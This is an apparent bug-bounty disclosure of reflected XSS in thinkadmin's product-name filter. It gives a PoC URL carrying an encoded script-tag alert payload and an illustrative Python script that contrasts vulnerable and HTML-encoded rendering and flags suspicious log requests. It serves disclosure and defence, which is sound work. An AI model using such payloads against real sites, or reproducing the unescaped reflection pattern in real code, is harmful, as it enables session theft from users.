Cross-site Scripting (XSS) - Reflected in zoujingli/thinkadmin

Valid

Reported on

Aug 25th 2021


✍️ Description

The application is vulnerable to a reflected XSS attack: the 商品名称 (product name) filter value passed in the `name` query parameter of the goods listing page is reflected into the response without HTML encoding.

🕵️‍♂️ Proof of Concept

Open the following page in the browser as an admin user. The 商品名称 (product name) field is vulnerable to reflected XSS; an alert box is displayed as the PoC.

https://testdomain11.com/data/shop.goods/index.html?cateids=941&code=94102&marks=%E8%A1%A3%E6%9C%8D&name=mLfNTqZD%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(1)%3C/ScRiPt%3E&rebate_type=0&status=0&truck_type=0&vip_entry=0
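As an added example (not code from the huntr report or from the thinkadmin project), the following Python script decodes the `name` parameter from the PoC URL above, contrasts a hypothetical template that reflects the value verbatim with one that HTML-encodes it, and applies a crude indicator to a constructed access-log line. The `render_*` functions, `LOG_LINE` and the regular expressions are assumptions made for illustration, not thinkadmin's actual code.

```python
# Added example for this report (not code from the huntr page or from the
# thinkadmin project): it parses the reported PoC URL, contrasts reflecting the
# `name` parameter verbatim with HTML-encoding it, and shows a crude log check.
# The render_* functions and the access-log line are constructed for illustration.
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The PoC URL exactly as given in the report.
POC_URL = (
    "https://testdomain11.com/data/shop.goods/index.html?cateids=941&code=94102"
    "&marks=%E8%A1%A3%E6%9C%8D&name=mLfNTqZD%27%22()%26%25%3Cacx%3E%3Cscript%3E"
    "alert(1)%3C/ScRiPt%3E&rebate_type=0&status=0&truck_type=0&vip_entry=0"
)

# Constructed access-log line (not from the page) in common log format.
LOG_LINE = (
    '10.0.0.5 - admin [25/Aug/2021:10:00:00 +0000] '
    '"GET /data/shop.goods/index.html?cateids=941&name=abc%3CScRiPt%3Ealert(1)%3C/script%3E HTTP/1.1" '
    '200 5120'
)

# A tag opening: "<", optional "/", then a letter. Case-insensitive by construction.
TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z]")


def query_params(url):
    """Decode the query string of a URL into {name: first value}."""
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def render_unsafe(value):
    """Vulnerable pattern (hypothetical): the search value is written into the
    input's value attribute verbatim, so a quote followed by markup breaks out
    of the attribute and is parsed as HTML."""
    return '<input name="name" value="' + value + '">'


def render_safe(value):
    """Hardened pattern: HTML-encode &, <, >, " and ' before the value reaches
    the attribute, so the browser treats the whole string as text."""
    return '<input name="name" value="' + html.escape(value, quote=True) + '">'


def tag_count(fragment):
    """Number of tag openings in a rendered fragment; exactly one means only the
    intended <input> element survived."""
    return len(TAG_RE.findall(fragment))


def request_target(log_line):
    """Pull the request target out of a common-log-format line."""
    m = re.search(r'"(?:GET|POST|HEAD) (\S+) HTTP/', log_line)
    return m.group(1) if m else ""


def looks_like_reflected_xss(target):
    """Crude detection indicator for a request target: percent-decode it, then
    look for a tag opening or a javascript: URL regardless of case (the PoC
    mixes case in </ScRiPt>). Expect false positives on legitimate markup."""
    decoded = unquote(target)
    return bool(TAG_RE.search(decoded) or re.search(r"javascript:", decoded, re.I))


if __name__ == "__main__":
    name = query_params(POC_URL)["name"]
    print("decoded name parameter:", name)
    print("unsafe render tag count:", tag_count(render_unsafe(name)))
    print("safe render tag count:", tag_count(render_safe(name)))
    print("safe render:", render_safe(name))
    print("log line flagged:", looks_like_reflected_xss(request_target(LOG_LINE)))
```

The safe variant is the shape of the fix: encode on output in the template rather than stripping characters on input, since the same value may be rendered in more than one place. The log check is only an indicator; the mixed-case `</ScRiPt>` in the PoC is why it matches case-insensitively after percent-decoding.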

💥 Impact

Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then impersonate that user.

Furthermore, JavaScript can read and make arbitrary modifications to the contents of a page being displayed to a user. Therefore, XSS in conjunction with some clever social engineering opens up a lot of possibilities for an attacker.

Timeline

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back
邹景立 validated this vulnerability
Melbin Mathew Antony has been awarded the disclosure bounty
The fix bounty is now up for grabs
邹景立 marked this as fixed with commit 296380
邹景立 has been awarded the fix bounty
This vulnerability will not receive a CVE

邹景立 (Maintainer):

Test after composer update.